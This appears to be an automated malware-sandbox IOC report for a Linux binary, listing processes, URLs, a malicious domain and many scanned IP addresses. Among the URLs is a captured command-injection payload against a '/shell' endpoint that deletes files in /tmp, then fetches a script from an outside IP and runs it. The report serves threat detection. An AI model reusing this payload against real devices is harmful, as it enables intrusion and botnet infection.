IOC Report

loading gif

Processes

Path
Cmdline
Malicious
/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86
/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86
clean
/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86
n/a
clean
/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86
n/a
clean
/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86
n/a
clean
/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86
n/a
clean
/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86
n/a
clean
/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86
n/a
clean
/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86
n/a
clean
/usr/bin/xfce4-panel
n/a
clean
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libwhiskermenu.so 1 8388646 whiskermenu "Whisker Menu" "Show a menu to easily access installed applications"
clean
/usr/bin/xfce4-panel
n/a
clean
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 4 8388653 systray "Notification Area" "Area where notification icons appear"
clean
/usr/bin/xfce4-panel
n/a
clean
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 5 8388654 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
clean
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0
n/a
clean
/usr/sbin/xfpm-power-backlight-helper
/usr/sbin/xfpm-power-backlight-helper --get-max-brightness
clean
/usr/bin/dbus-daemon
n/a
clean
/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
clean
/usr/bin/dbus-daemon
n/a
clean
/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
clean
There are 10 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+212.193.30.245/jaws;sh+/tmp/jaws
213.24.83.10
malicious
http://212.193.30.245/bin
unknown
clean
http://schemas.xmlsoap.org/soap/encoding/
unknown
clean
http://schemas.xmlsoap.org/soap/envelope/
unknown
clean

Domains

Name
IP
Malicious
api.cashapi.xyz
212.193.30.245
malicious

IPs

IP
Domain
Country
Malicious
156.235.45.179
unknown
Seychelles
clean
156.56.148.25
unknown
United States
clean
160.160.9.214
unknown
Morocco
clean
197.10.113.5
unknown
Tunisia
clean
109.20.138.55
unknown
France
clean
156.216.92.25
unknown
Egypt
clean
41.175.162.112
unknown
South Africa
clean
164.225.163.112
unknown
United States
clean
152.110.186.224
unknown
South Africa
clean
37.233.98.125
unknown
Poland
clean
42.72.141.205
unknown
Taiwan; Republic of China (ROC)
clean
109.151.139.187
unknown
United Kingdom
clean
41.143.104.38
unknown
Morocco
clean
197.12.199.87
unknown
Tunisia
clean
138.139.122.147
unknown
United States
clean
34.117.160.28
unknown
United States
clean
156.65.187.98
unknown
United States
clean
148.38.214.158
unknown
United States
clean
41.71.222.53
unknown
Nigeria
clean
109.165.204.48
unknown
Bosnia and Herzegowina
clean
115.18.198.47
unknown
Korea Republic of
clean
103.16.89.226
unknown
China
clean
113.65.120.231
unknown
China
clean
213.50.24.110
unknown
Sweden
clean
81.89.137.60
unknown
United Kingdom
clean
14.73.4.158
unknown
Korea Republic of
clean
147.155.164.68
unknown
United States
clean
115.124.8.6
unknown
Australia
clean
154.117.112.88
unknown
Nigeria
clean
156.100.32.224
unknown
United States
clean
145.106.186.110
unknown
Netherlands
clean
109.175.65.223
unknown
Bosnia and Herzegowina
clean
220.58.199.81
unknown
Japan
clean
219.86.3.234
unknown
Taiwan; Republic of China (ROC)
clean
109.170.87.102
unknown
Russian Federation
clean
146.152.1.115
unknown
United States
clean
98.200.11.53
unknown
United States
clean
197.66.206.56
unknown
South Africa
clean
156.69.212.23
unknown
New Zealand
clean
5.70.237.212
unknown
United Kingdom
clean
123.142.144.14
unknown
Korea Republic of
clean
210.106.86.102
unknown
Korea Republic of
clean
194.50.24.65
unknown
Russian Federation
clean
103.30.88.232
unknown
Indonesia
clean
123.22.248.34
unknown
Viet Nam
clean
150.199.122.201
unknown
United States
clean
118.211.239.158
unknown
Australia
clean
42.7.192.239
unknown
China
clean
117.12.214.160
unknown
China
clean
178.247.166.1
unknown
Turkey
clean
197.90.49.92
unknown
South Africa
clean
157.182.20.26
unknown
United States
clean
64.60.19.225
unknown
United States
clean
69.164.235.158
unknown
United States
clean
204.156.18.76
unknown
United States
clean
210.28.112.157
unknown
China
clean
117.188.149.133
unknown
China
clean
223.86.209.224
unknown
China
clean
123.0.16.114
unknown
Bangladesh
clean
63.243.65.86
unknown
United States
clean
210.162.26.25
unknown
Japan
clean
180.193.2.52
unknown
Philippines
clean
63.58.53.56
unknown
United States
clean
202.138.111.136
unknown
India
clean
43.109.235.46
unknown
Japan
clean
117.97.172.124
unknown
India
clean
78.211.212.49
unknown
France
clean
95.227.19.78
unknown
Italy
clean
178.200.56.63
unknown
Germany
clean
161.195.174.53
unknown
United States
clean
202.133.114.113
unknown
Japan
clean
102.233.173.123
unknown
unknown
clean
2.255.34.221
unknown
Sweden
clean
197.5.249.194
unknown
Tunisia
clean
77.24.233.249
unknown
Germany
clean
68.55.86.12
unknown
United States
clean
41.57.121.209
unknown
Nigeria
clean
79.208.52.225
unknown
Germany
clean
67.127.118.168
unknown
United States
clean
178.103.145.208
unknown
United Kingdom
clean
39.221.88.106
unknown
Indonesia
clean
200.47.223.247
unknown
Venezuela
clean
121.39.5.182
unknown
China
clean
25.15.214.15
unknown
United Kingdom
clean
113.229.229.45
unknown
China
clean
206.47.198.218
unknown
Canada
clean
193.67.59.15
unknown
Netherlands
clean
41.32.98.108
unknown
Egypt
clean
178.65.37.121
unknown
Russian Federation
clean
39.201.95.78
unknown
Indonesia
clean
41.110.216.160
unknown
Algeria
clean
123.219.236.142
unknown
Japan
clean
117.182.251.101
unknown
China
clean
130.78.16.133
unknown
Netherlands
clean
117.60.217.100
unknown
China
clean
5.72.153.235
unknown
Iran (ISLAMIC Republic Of)
clean
212.222.240.78
unknown
United Kingdom
clean
156.93.179.202
unknown
United States
clean
60.171.28.2
unknown
China
clean
94.178.33.147
unknown
Ukraine
clean
There are 90 hidden IPs, click here to show them.